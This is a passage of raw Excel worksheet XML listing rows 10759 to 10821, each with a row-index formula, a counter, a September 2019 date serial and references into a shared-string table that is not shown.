      <c r="C10759" t="s">
        <v>19637</v>
      </c>
      <c r="D10759" s="1">
        <v>43711</v>
      </c>
      <c r="F10759" t="s">
        <v>9978</v>
      </c>
      <c r="G10759" t="s">
        <v>20619</v>
      </c>
    </row>
    <row r="10760" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10760">
        <f t="shared" si="168"/>
        <v>10759</v>
      </c>
      <c r="B10760">
        <v>759</v>
      </c>
      <c r="C10760" t="s">
        <v>19637</v>
      </c>
      <c r="D10760" s="1">
        <v>43736</v>
      </c>
      <c r="E10760" t="s">
        <v>20620</v>
      </c>
      <c r="F10760" t="s">
        <v>10526</v>
      </c>
      <c r="G10760" t="s">
        <v>20621</v>
      </c>
    </row>
    <row r="10761" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10761">
        <f t="shared" si="168"/>
        <v>10760</v>
      </c>
      <c r="B10761">
        <v>760</v>
      </c>
      <c r="C10761" t="s">
        <v>19637</v>
      </c>
      <c r="D10761" s="1">
        <v>43715</v>
      </c>
      <c r="E10761" t="s">
        <v>19750</v>
      </c>
      <c r="F10761" t="s">
        <v>9978</v>
      </c>
      <c r="G10761" t="s">
        <v>20622</v>
      </c>
    </row>
    <row r="10762" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10762">
        <f t="shared" si="168"/>
        <v>10761</v>
      </c>
      <c r="B10762">
        <v>761</v>
      </c>
      <c r="C10762" t="s">
        <v>19637</v>
      </c>
      <c r="D10762" s="1">
        <v>43715</v>
      </c>
      <c r="E10762" t="s">
        <v>19785</v>
      </c>
      <c r="F10762" t="s">
        <v>9975</v>
      </c>
      <c r="G10762" t="s">
        <v>20623</v>
      </c>
    </row>
    <row r="10763" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10763">
        <f t="shared" si="168"/>
        <v>10762</v>
      </c>
      <c r="B10763">
        <v>762</v>
      </c>
      <c r="C10763" t="s">
        <v>19637</v>
      </c>
      <c r="D10763" s="1">
        <v>43711</v>
      </c>
      <c r="F10763" t="s">
        <v>10526</v>
      </c>
      <c r="G10763" t="s">
        <v>20624</v>
      </c>
    </row>
    <row r="10764" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10764">
        <f t="shared" si="168"/>
        <v>10763</v>
      </c>
      <c r="B10764">
        <v>763</v>
      </c>
      <c r="C10764" t="s">
        <v>19637</v>
      </c>
      <c r="D10764" s="1">
        <v>43728</v>
      </c>
      <c r="E10764" t="s">
        <v>19640</v>
      </c>
      <c r="F10764" t="s">
        <v>10021</v>
      </c>
      <c r="G10764" t="s">
        <v>20625</v>
      </c>
    </row>
    <row r="10765" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10765">
        <f t="shared" si="168"/>
        <v>10764</v>
      </c>
      <c r="B10765">
        <v>764</v>
      </c>
      <c r="C10765" t="s">
        <v>19637</v>
      </c>
      <c r="D10765" s="1">
        <v>43738</v>
      </c>
      <c r="E10765" t="s">
        <v>20626</v>
      </c>
      <c r="F10765" t="s">
        <v>10021</v>
      </c>
      <c r="G10765" t="s">
        <v>20627</v>
      </c>
    </row>
    <row r="10766" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10766">
        <f t="shared" si="168"/>
        <v>10765</v>
      </c>
      <c r="B10766">
        <v>765</v>
      </c>
      <c r="C10766" t="s">
        <v>19637</v>
      </c>
      <c r="D10766" s="1">
        <v>43712</v>
      </c>
      <c r="F10766" t="s">
        <v>9978</v>
      </c>
      <c r="G10766" t="s">
        <v>20628</v>
      </c>
    </row>
    <row r="10767" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10767">
        <f t="shared" si="168"/>
        <v>10766</v>
      </c>
      <c r="B10767">
        <v>766</v>
      </c>
      <c r="C10767" t="s">
        <v>19637</v>
      </c>
      <c r="D10767" s="1">
        <v>43719</v>
      </c>
      <c r="E10767" t="s">
        <v>20324</v>
      </c>
      <c r="F10767" t="s">
        <v>10526</v>
      </c>
      <c r="G10767" t="s">
        <v>20629</v>
      </c>
    </row>
    <row r="10768" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10768">
        <f t="shared" si="168"/>
        <v>10767</v>
      </c>
      <c r="B10768">
        <v>767</v>
      </c>
      <c r="C10768" t="s">
        <v>19637</v>
      </c>
      <c r="D10768" s="1">
        <v>43728</v>
      </c>
      <c r="E10768" t="s">
        <v>19640</v>
      </c>
      <c r="F10768" t="s">
        <v>10021</v>
      </c>
      <c r="G10768" t="s">
        <v>20630</v>
      </c>
    </row>
    <row r="10769" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10769">
        <f t="shared" si="168"/>
        <v>10768</v>
      </c>
      <c r="B10769">
        <v>768</v>
      </c>
      <c r="C10769" t="s">
        <v>19637</v>
      </c>
      <c r="D10769" s="1">
        <v>43711</v>
      </c>
      <c r="F10769" t="s">
        <v>10526</v>
      </c>
      <c r="G10769" t="s">
        <v>20631</v>
      </c>
    </row>
    <row r="10770" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10770">
        <f t="shared" si="168"/>
        <v>10769</v>
      </c>
      <c r="B10770">
        <v>769</v>
      </c>
      <c r="C10770" t="s">
        <v>19637</v>
      </c>
      <c r="D10770" s="1">
        <v>43710</v>
      </c>
      <c r="E10770" t="s">
        <v>19705</v>
      </c>
      <c r="F10770" t="s">
        <v>10021</v>
      </c>
      <c r="G10770" t="s">
        <v>20632</v>
      </c>
    </row>
    <row r="10771" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10771">
        <f t="shared" si="168"/>
        <v>10770</v>
      </c>
      <c r="B10771">
        <v>770</v>
      </c>
      <c r="C10771" t="s">
        <v>19637</v>
      </c>
      <c r="D10771" s="1">
        <v>43717</v>
      </c>
      <c r="E10771" t="s">
        <v>20633</v>
      </c>
      <c r="F10771" t="s">
        <v>9978</v>
      </c>
      <c r="G10771" t="s">
        <v>20634</v>
      </c>
    </row>
    <row r="10772" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10772">
        <f t="shared" si="168"/>
        <v>10771</v>
      </c>
      <c r="B10772">
        <v>771</v>
      </c>
      <c r="C10772" t="s">
        <v>19637</v>
      </c>
      <c r="D10772" s="1">
        <v>43728</v>
      </c>
      <c r="E10772" t="s">
        <v>19672</v>
      </c>
      <c r="F10772" t="s">
        <v>10021</v>
      </c>
      <c r="G10772" t="s">
        <v>20635</v>
      </c>
    </row>
    <row r="10773" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10773">
        <f t="shared" si="168"/>
        <v>10772</v>
      </c>
      <c r="B10773">
        <v>772</v>
      </c>
      <c r="C10773" t="s">
        <v>19637</v>
      </c>
      <c r="D10773" s="1">
        <v>43712</v>
      </c>
      <c r="F10773" t="s">
        <v>10526</v>
      </c>
      <c r="G10773" t="s">
        <v>20636</v>
      </c>
    </row>
    <row r="10774" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10774">
        <f t="shared" si="168"/>
        <v>10773</v>
      </c>
      <c r="B10774">
        <v>773</v>
      </c>
      <c r="C10774" t="s">
        <v>19637</v>
      </c>
      <c r="D10774" s="1">
        <v>43736</v>
      </c>
      <c r="E10774" t="s">
        <v>19796</v>
      </c>
      <c r="F10774" t="s">
        <v>10021</v>
      </c>
      <c r="G10774" t="s">
        <v>20637</v>
      </c>
    </row>
    <row r="10775" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10775">
        <f t="shared" si="168"/>
        <v>10774</v>
      </c>
      <c r="B10775">
        <v>774</v>
      </c>
      <c r="C10775" t="s">
        <v>19637</v>
      </c>
      <c r="D10775" s="1">
        <v>43734</v>
      </c>
      <c r="E10775" t="s">
        <v>19653</v>
      </c>
      <c r="F10775" t="s">
        <v>9975</v>
      </c>
      <c r="G10775" t="s">
        <v>20638</v>
      </c>
    </row>
    <row r="10776" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10776">
        <f t="shared" si="168"/>
        <v>10775</v>
      </c>
      <c r="B10776">
        <v>775</v>
      </c>
      <c r="C10776" t="s">
        <v>19637</v>
      </c>
      <c r="D10776" s="1">
        <v>43720</v>
      </c>
      <c r="E10776" t="s">
        <v>20312</v>
      </c>
      <c r="F10776" t="s">
        <v>10526</v>
      </c>
      <c r="G10776" t="s">
        <v>20639</v>
      </c>
    </row>
    <row r="10777" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10777">
        <f t="shared" si="168"/>
        <v>10776</v>
      </c>
      <c r="B10777">
        <v>776</v>
      </c>
      <c r="C10777" t="s">
        <v>19637</v>
      </c>
      <c r="D10777" s="1">
        <v>43722</v>
      </c>
      <c r="E10777" t="s">
        <v>19643</v>
      </c>
      <c r="F10777" t="s">
        <v>10021</v>
      </c>
      <c r="G10777" t="s">
        <v>20640</v>
      </c>
    </row>
    <row r="10778" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10778">
        <f t="shared" si="168"/>
        <v>10777</v>
      </c>
      <c r="B10778">
        <v>777</v>
      </c>
      <c r="C10778" t="s">
        <v>19637</v>
      </c>
      <c r="D10778" s="1">
        <v>43729</v>
      </c>
      <c r="F10778" t="s">
        <v>10526</v>
      </c>
      <c r="G10778" t="s">
        <v>20641</v>
      </c>
    </row>
    <row r="10779" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10779">
        <f t="shared" si="168"/>
        <v>10778</v>
      </c>
      <c r="B10779">
        <v>778</v>
      </c>
      <c r="C10779" t="s">
        <v>19637</v>
      </c>
      <c r="D10779" s="1">
        <v>43738</v>
      </c>
      <c r="E10779" t="s">
        <v>20293</v>
      </c>
      <c r="F10779" t="s">
        <v>10526</v>
      </c>
      <c r="G10779" t="s">
        <v>20642</v>
      </c>
    </row>
    <row r="10780" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10780">
        <f t="shared" si="168"/>
        <v>10779</v>
      </c>
      <c r="B10780">
        <v>779</v>
      </c>
      <c r="C10780" t="s">
        <v>19637</v>
      </c>
      <c r="D10780" s="1">
        <v>43734</v>
      </c>
      <c r="E10780" t="s">
        <v>19640</v>
      </c>
      <c r="F10780" t="s">
        <v>9975</v>
      </c>
      <c r="G10780" t="s">
        <v>20643</v>
      </c>
    </row>
    <row r="10781" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10781">
        <f t="shared" si="168"/>
        <v>10780</v>
      </c>
      <c r="B10781">
        <v>780</v>
      </c>
      <c r="C10781" t="s">
        <v>19637</v>
      </c>
      <c r="D10781" s="1">
        <v>43721</v>
      </c>
      <c r="E10781" t="s">
        <v>19640</v>
      </c>
      <c r="F10781" t="s">
        <v>9975</v>
      </c>
      <c r="G10781" t="s">
        <v>20644</v>
      </c>
    </row>
    <row r="10782" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10782">
        <f t="shared" si="168"/>
        <v>10781</v>
      </c>
      <c r="B10782">
        <v>781</v>
      </c>
      <c r="C10782" t="s">
        <v>19637</v>
      </c>
      <c r="D10782" s="1">
        <v>43720</v>
      </c>
      <c r="E10782" t="s">
        <v>19687</v>
      </c>
      <c r="F10782" t="s">
        <v>10021</v>
      </c>
      <c r="G10782" t="s">
        <v>20645</v>
      </c>
    </row>
    <row r="10783" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10783">
        <f t="shared" si="168"/>
        <v>10782</v>
      </c>
      <c r="B10783">
        <v>782</v>
      </c>
      <c r="C10783" t="s">
        <v>19637</v>
      </c>
      <c r="D10783" s="1">
        <v>43709</v>
      </c>
      <c r="E10783" t="s">
        <v>19794</v>
      </c>
      <c r="F10783" t="s">
        <v>10526</v>
      </c>
      <c r="G10783" t="s">
        <v>20646</v>
      </c>
    </row>
    <row r="10784" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10784">
        <f t="shared" si="168"/>
        <v>10783</v>
      </c>
      <c r="B10784">
        <v>783</v>
      </c>
      <c r="C10784" t="s">
        <v>19637</v>
      </c>
      <c r="D10784" s="1">
        <v>43719</v>
      </c>
      <c r="E10784" t="s">
        <v>19676</v>
      </c>
      <c r="F10784" t="s">
        <v>10021</v>
      </c>
      <c r="G10784" t="s">
        <v>20647</v>
      </c>
    </row>
    <row r="10785" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10785">
        <f t="shared" si="168"/>
        <v>10784</v>
      </c>
      <c r="B10785">
        <v>784</v>
      </c>
      <c r="C10785" t="s">
        <v>19637</v>
      </c>
      <c r="D10785" s="1">
        <v>43728</v>
      </c>
      <c r="F10785" t="s">
        <v>10526</v>
      </c>
      <c r="G10785" t="s">
        <v>20648</v>
      </c>
    </row>
    <row r="10786" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10786">
        <f t="shared" si="168"/>
        <v>10785</v>
      </c>
      <c r="B10786">
        <v>785</v>
      </c>
      <c r="C10786" t="s">
        <v>19637</v>
      </c>
      <c r="D10786" s="1">
        <v>43714</v>
      </c>
      <c r="E10786" t="s">
        <v>19638</v>
      </c>
      <c r="F10786" t="s">
        <v>10021</v>
      </c>
      <c r="G10786" t="s">
        <v>20649</v>
      </c>
    </row>
    <row r="10787" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10787">
        <f t="shared" si="168"/>
        <v>10786</v>
      </c>
      <c r="B10787">
        <v>786</v>
      </c>
      <c r="C10787" t="s">
        <v>19637</v>
      </c>
      <c r="D10787" s="1">
        <v>43710</v>
      </c>
      <c r="E10787" t="s">
        <v>19650</v>
      </c>
      <c r="F10787" t="s">
        <v>10021</v>
      </c>
      <c r="G10787" t="s">
        <v>20650</v>
      </c>
    </row>
    <row r="10788" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10788">
        <f t="shared" si="168"/>
        <v>10787</v>
      </c>
      <c r="B10788">
        <v>787</v>
      </c>
      <c r="C10788" t="s">
        <v>19637</v>
      </c>
      <c r="D10788" s="1">
        <v>43737</v>
      </c>
      <c r="E10788" t="s">
        <v>19750</v>
      </c>
      <c r="F10788" t="s">
        <v>9978</v>
      </c>
      <c r="G10788" t="s">
        <v>20651</v>
      </c>
    </row>
    <row r="10789" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10789">
        <f t="shared" si="168"/>
        <v>10788</v>
      </c>
      <c r="B10789">
        <v>788</v>
      </c>
      <c r="C10789" t="s">
        <v>19637</v>
      </c>
      <c r="D10789" s="1">
        <v>43715</v>
      </c>
      <c r="E10789" t="s">
        <v>19640</v>
      </c>
      <c r="F10789" t="s">
        <v>9975</v>
      </c>
      <c r="G10789" t="s">
        <v>20652</v>
      </c>
    </row>
    <row r="10790" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10790">
        <f t="shared" si="168"/>
        <v>10789</v>
      </c>
      <c r="B10790">
        <v>789</v>
      </c>
      <c r="C10790" t="s">
        <v>19637</v>
      </c>
      <c r="D10790" s="1">
        <v>43729</v>
      </c>
      <c r="E10790" t="s">
        <v>20653</v>
      </c>
      <c r="F10790" t="s">
        <v>10526</v>
      </c>
      <c r="G10790" t="s">
        <v>20654</v>
      </c>
    </row>
    <row r="10791" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10791">
        <f t="shared" si="168"/>
        <v>10790</v>
      </c>
      <c r="B10791">
        <v>790</v>
      </c>
      <c r="C10791" t="s">
        <v>19637</v>
      </c>
      <c r="D10791" s="1">
        <v>43738</v>
      </c>
      <c r="E10791" t="s">
        <v>20655</v>
      </c>
      <c r="F10791" t="s">
        <v>9978</v>
      </c>
      <c r="G10791" t="s">
        <v>20656</v>
      </c>
    </row>
    <row r="10792" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10792">
        <f t="shared" si="168"/>
        <v>10791</v>
      </c>
      <c r="B10792">
        <v>791</v>
      </c>
      <c r="C10792" t="s">
        <v>19637</v>
      </c>
      <c r="D10792" s="1">
        <v>43719</v>
      </c>
      <c r="E10792" t="s">
        <v>19896</v>
      </c>
      <c r="F10792" t="s">
        <v>10021</v>
      </c>
      <c r="G10792" t="s">
        <v>20657</v>
      </c>
    </row>
    <row r="10793" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10793">
        <f t="shared" si="168"/>
        <v>10792</v>
      </c>
      <c r="B10793">
        <v>792</v>
      </c>
      <c r="C10793" t="s">
        <v>19637</v>
      </c>
      <c r="D10793" s="1">
        <v>43719</v>
      </c>
      <c r="E10793" t="s">
        <v>20658</v>
      </c>
      <c r="F10793" t="s">
        <v>10526</v>
      </c>
      <c r="G10793" t="s">
        <v>20659</v>
      </c>
    </row>
    <row r="10794" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10794">
        <f t="shared" si="168"/>
        <v>10793</v>
      </c>
      <c r="B10794">
        <v>793</v>
      </c>
      <c r="C10794" t="s">
        <v>19637</v>
      </c>
      <c r="D10794" s="1">
        <v>43710</v>
      </c>
      <c r="E10794" t="s">
        <v>19680</v>
      </c>
      <c r="F10794" t="s">
        <v>10021</v>
      </c>
      <c r="G10794" t="s">
        <v>20660</v>
      </c>
    </row>
    <row r="10795" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10795">
        <f t="shared" si="168"/>
        <v>10794</v>
      </c>
      <c r="B10795">
        <v>794</v>
      </c>
      <c r="C10795" t="s">
        <v>19637</v>
      </c>
      <c r="D10795" s="1">
        <v>43714</v>
      </c>
      <c r="E10795" t="s">
        <v>19690</v>
      </c>
      <c r="F10795" t="s">
        <v>9978</v>
      </c>
      <c r="G10795" t="s">
        <v>20661</v>
      </c>
    </row>
    <row r="10796" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10796">
        <f t="shared" si="168"/>
        <v>10795</v>
      </c>
      <c r="B10796">
        <v>795</v>
      </c>
      <c r="C10796" t="s">
        <v>19637</v>
      </c>
      <c r="D10796" s="1">
        <v>43717</v>
      </c>
      <c r="E10796" t="s">
        <v>20034</v>
      </c>
      <c r="F10796" t="s">
        <v>10021</v>
      </c>
      <c r="G10796" t="s">
        <v>20662</v>
      </c>
    </row>
    <row r="10797" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10797">
        <f t="shared" si="168"/>
        <v>10796</v>
      </c>
      <c r="B10797">
        <v>796</v>
      </c>
      <c r="C10797" t="s">
        <v>19637</v>
      </c>
      <c r="D10797" s="1">
        <v>43709</v>
      </c>
      <c r="E10797" t="s">
        <v>19640</v>
      </c>
      <c r="F10797" t="s">
        <v>10526</v>
      </c>
      <c r="G10797" t="s">
        <v>20663</v>
      </c>
    </row>
    <row r="10798" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10798">
        <f t="shared" si="168"/>
        <v>10797</v>
      </c>
      <c r="B10798">
        <v>797</v>
      </c>
      <c r="C10798" t="s">
        <v>19637</v>
      </c>
      <c r="D10798" s="1">
        <v>43730</v>
      </c>
      <c r="E10798" t="s">
        <v>20664</v>
      </c>
      <c r="F10798" t="s">
        <v>10526</v>
      </c>
      <c r="G10798" t="s">
        <v>20665</v>
      </c>
    </row>
    <row r="10799" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10799">
        <f t="shared" si="168"/>
        <v>10798</v>
      </c>
      <c r="B10799">
        <v>798</v>
      </c>
      <c r="C10799" t="s">
        <v>19637</v>
      </c>
      <c r="D10799" s="1">
        <v>43718</v>
      </c>
      <c r="F10799" t="s">
        <v>10526</v>
      </c>
      <c r="G10799" t="s">
        <v>20666</v>
      </c>
    </row>
    <row r="10800" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10800">
        <f t="shared" si="168"/>
        <v>10799</v>
      </c>
      <c r="B10800">
        <v>799</v>
      </c>
      <c r="C10800" t="s">
        <v>19637</v>
      </c>
      <c r="D10800" s="1">
        <v>43717</v>
      </c>
      <c r="E10800" t="s">
        <v>19680</v>
      </c>
      <c r="F10800" t="s">
        <v>10021</v>
      </c>
      <c r="G10800" t="s">
        <v>20667</v>
      </c>
    </row>
    <row r="10801" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10801">
        <f t="shared" si="168"/>
        <v>10800</v>
      </c>
      <c r="B10801">
        <v>800</v>
      </c>
      <c r="C10801" t="s">
        <v>19637</v>
      </c>
      <c r="D10801" s="1">
        <v>43733</v>
      </c>
      <c r="E10801" t="s">
        <v>19640</v>
      </c>
      <c r="F10801" t="s">
        <v>10021</v>
      </c>
      <c r="G10801" t="s">
        <v>20668</v>
      </c>
    </row>
    <row r="10802" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10802">
        <f t="shared" si="168"/>
        <v>10801</v>
      </c>
      <c r="B10802">
        <v>801</v>
      </c>
      <c r="C10802" t="s">
        <v>19637</v>
      </c>
      <c r="D10802" s="1">
        <v>43726</v>
      </c>
      <c r="F10802" t="s">
        <v>10526</v>
      </c>
      <c r="G10802" t="s">
        <v>20669</v>
      </c>
    </row>
    <row r="10803" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10803">
        <f t="shared" si="168"/>
        <v>10802</v>
      </c>
      <c r="B10803">
        <v>802</v>
      </c>
      <c r="C10803" t="s">
        <v>19637</v>
      </c>
      <c r="D10803" s="1">
        <v>43728</v>
      </c>
      <c r="E10803" t="s">
        <v>20670</v>
      </c>
      <c r="F10803" t="s">
        <v>9975</v>
      </c>
      <c r="G10803" t="s">
        <v>20671</v>
      </c>
    </row>
    <row r="10804" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10804">
        <f t="shared" si="168"/>
        <v>10803</v>
      </c>
      <c r="B10804">
        <v>803</v>
      </c>
      <c r="C10804" t="s">
        <v>19637</v>
      </c>
      <c r="D10804" s="1">
        <v>43729</v>
      </c>
      <c r="E10804" t="s">
        <v>20672</v>
      </c>
      <c r="F10804" t="s">
        <v>9975</v>
      </c>
      <c r="G10804" t="s">
        <v>20673</v>
      </c>
    </row>
    <row r="10805" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10805">
        <f t="shared" si="168"/>
        <v>10804</v>
      </c>
      <c r="B10805">
        <v>804</v>
      </c>
      <c r="C10805" t="s">
        <v>19637</v>
      </c>
      <c r="D10805" s="1">
        <v>43724</v>
      </c>
      <c r="E10805" t="s">
        <v>20507</v>
      </c>
      <c r="F10805" t="s">
        <v>10526</v>
      </c>
      <c r="G10805" t="s">
        <v>20674</v>
      </c>
    </row>
    <row r="10806" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10806">
        <f t="shared" si="168"/>
        <v>10805</v>
      </c>
      <c r="B10806">
        <v>805</v>
      </c>
      <c r="C10806" t="s">
        <v>19637</v>
      </c>
      <c r="D10806" s="1">
        <v>43715</v>
      </c>
      <c r="E10806" t="s">
        <v>19680</v>
      </c>
      <c r="F10806" t="s">
        <v>10021</v>
      </c>
      <c r="G10806" t="s">
        <v>20675</v>
      </c>
    </row>
    <row r="10807" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10807">
        <f t="shared" si="168"/>
        <v>10806</v>
      </c>
      <c r="B10807">
        <v>806</v>
      </c>
      <c r="C10807" t="s">
        <v>19637</v>
      </c>
      <c r="D10807" s="1">
        <v>43722</v>
      </c>
      <c r="E10807" t="s">
        <v>19650</v>
      </c>
      <c r="F10807" t="s">
        <v>10021</v>
      </c>
      <c r="G10807" t="s">
        <v>20676</v>
      </c>
    </row>
    <row r="10808" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10808">
        <f t="shared" si="168"/>
        <v>10807</v>
      </c>
      <c r="B10808">
        <v>807</v>
      </c>
      <c r="C10808" t="s">
        <v>19637</v>
      </c>
      <c r="D10808" s="1">
        <v>43727</v>
      </c>
      <c r="E10808" t="s">
        <v>20677</v>
      </c>
      <c r="F10808" t="s">
        <v>10526</v>
      </c>
      <c r="G10808" t="s">
        <v>20678</v>
      </c>
    </row>
    <row r="10809" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10809">
        <f t="shared" si="168"/>
        <v>10808</v>
      </c>
      <c r="B10809">
        <v>808</v>
      </c>
      <c r="C10809" t="s">
        <v>19637</v>
      </c>
      <c r="D10809" s="1">
        <v>43732</v>
      </c>
      <c r="E10809" t="s">
        <v>19840</v>
      </c>
      <c r="F10809" t="s">
        <v>10021</v>
      </c>
      <c r="G10809" t="s">
        <v>20679</v>
      </c>
    </row>
    <row r="10810" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10810">
        <f t="shared" si="168"/>
        <v>10809</v>
      </c>
      <c r="B10810">
        <v>809</v>
      </c>
      <c r="C10810" t="s">
        <v>19637</v>
      </c>
      <c r="D10810" s="1">
        <v>43731</v>
      </c>
      <c r="E10810" t="s">
        <v>20005</v>
      </c>
      <c r="F10810" t="s">
        <v>9975</v>
      </c>
      <c r="G10810" t="s">
        <v>20680</v>
      </c>
    </row>
    <row r="10811" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10811">
        <f t="shared" si="168"/>
        <v>10810</v>
      </c>
      <c r="B10811">
        <v>810</v>
      </c>
      <c r="C10811" t="s">
        <v>19637</v>
      </c>
      <c r="D10811" s="1">
        <v>43713</v>
      </c>
      <c r="F10811" t="s">
        <v>10526</v>
      </c>
      <c r="G10811" t="s">
        <v>20681</v>
      </c>
    </row>
    <row r="10812" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10812">
        <f t="shared" si="168"/>
        <v>10811</v>
      </c>
      <c r="B10812">
        <v>811</v>
      </c>
      <c r="C10812" t="s">
        <v>19637</v>
      </c>
      <c r="D10812" s="1">
        <v>43726</v>
      </c>
      <c r="E10812" t="s">
        <v>20682</v>
      </c>
      <c r="F10812" t="s">
        <v>10526</v>
      </c>
      <c r="G10812" t="s">
        <v>20683</v>
      </c>
    </row>
    <row r="10813" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10813">
        <f t="shared" si="168"/>
        <v>10812</v>
      </c>
      <c r="B10813">
        <v>812</v>
      </c>
      <c r="C10813" t="s">
        <v>19637</v>
      </c>
      <c r="D10813" s="1">
        <v>43709</v>
      </c>
      <c r="E10813" t="s">
        <v>20684</v>
      </c>
      <c r="F10813" t="s">
        <v>10021</v>
      </c>
      <c r="G10813" t="s">
        <v>20685</v>
      </c>
    </row>
    <row r="10814" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10814">
        <f t="shared" si="168"/>
        <v>10813</v>
      </c>
      <c r="B10814">
        <v>813</v>
      </c>
      <c r="C10814" t="s">
        <v>19637</v>
      </c>
      <c r="D10814" s="1">
        <v>43724</v>
      </c>
      <c r="E10814" t="s">
        <v>20686</v>
      </c>
      <c r="F10814" t="s">
        <v>10526</v>
      </c>
      <c r="G10814" t="s">
        <v>20687</v>
      </c>
    </row>
    <row r="10815" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10815">
        <f t="shared" si="168"/>
        <v>10814</v>
      </c>
      <c r="B10815">
        <v>814</v>
      </c>
      <c r="C10815" t="s">
        <v>19637</v>
      </c>
      <c r="D10815" s="1">
        <v>43728</v>
      </c>
      <c r="E10815" t="s">
        <v>19687</v>
      </c>
      <c r="F10815" t="s">
        <v>10021</v>
      </c>
      <c r="G10815" t="s">
        <v>20688</v>
      </c>
    </row>
    <row r="10816" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10816">
        <f t="shared" si="168"/>
        <v>10815</v>
      </c>
      <c r="B10816">
        <v>815</v>
      </c>
      <c r="C10816" t="s">
        <v>19637</v>
      </c>
      <c r="D10816" s="1">
        <v>43738</v>
      </c>
      <c r="E10816" t="s">
        <v>19687</v>
      </c>
      <c r="F10816" t="s">
        <v>10021</v>
      </c>
      <c r="G10816" t="s">
        <v>20689</v>
      </c>
    </row>
    <row r="10817" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10817">
        <f t="shared" si="168"/>
        <v>10816</v>
      </c>
      <c r="B10817">
        <v>816</v>
      </c>
      <c r="C10817" t="s">
        <v>19637</v>
      </c>
      <c r="D10817" s="1">
        <v>43729</v>
      </c>
      <c r="E10817" t="s">
        <v>19640</v>
      </c>
      <c r="F10817" t="s">
        <v>10021</v>
      </c>
      <c r="G10817" t="s">
        <v>20690</v>
      </c>
    </row>
    <row r="10818" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10818">
        <f t="shared" si="168"/>
        <v>10817</v>
      </c>
      <c r="B10818">
        <v>817</v>
      </c>
      <c r="C10818" t="s">
        <v>19637</v>
      </c>
      <c r="D10818" s="1">
        <v>43710</v>
      </c>
      <c r="E10818" t="s">
        <v>19650</v>
      </c>
      <c r="F10818" t="s">
        <v>10021</v>
      </c>
      <c r="G10818" t="s">
        <v>20691</v>
      </c>
    </row>
    <row r="10819" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10819">
        <f t="shared" ref="A10819:A10882" si="169">+ROW(A10818)</f>
        <v>10818</v>
      </c>
      <c r="B10819">
        <v>818</v>
      </c>
      <c r="C10819" t="s">
        <v>19637</v>
      </c>
      <c r="D10819" s="1">
        <v>43725</v>
      </c>
      <c r="E10819" t="s">
        <v>19648</v>
      </c>
      <c r="F10819" t="s">
        <v>10021</v>
      </c>
      <c r="G10819" t="s">
        <v>20692</v>
      </c>
    </row>
    <row r="10820" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10820">
        <f t="shared" si="169"/>
        <v>10819</v>
      </c>
      <c r="B10820">
        <v>819</v>
      </c>
      <c r="C10820" t="s">
        <v>19637</v>
      </c>
      <c r="D10820" s="1">
        <v>43729</v>
      </c>
      <c r="E10820" t="s">
        <v>19650</v>
      </c>
      <c r="F10820" t="s">
        <v>10021</v>
      </c>
      <c r="G10820" t="s">
        <v>20693</v>
      </c>
    </row>
    <row r="10821" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10821">
        <f t="shared" si="169"/>
        <v>10820</v>
      </c>
      <c r="B10821">
        <v>820</v>
      </c>
      <c r="C10821" t="s">
        <v>19637</v>
      </c>
      <c r="D10821" s="1">
        <v>43718</v>
      </c>
      <c r="E10821" t="s">
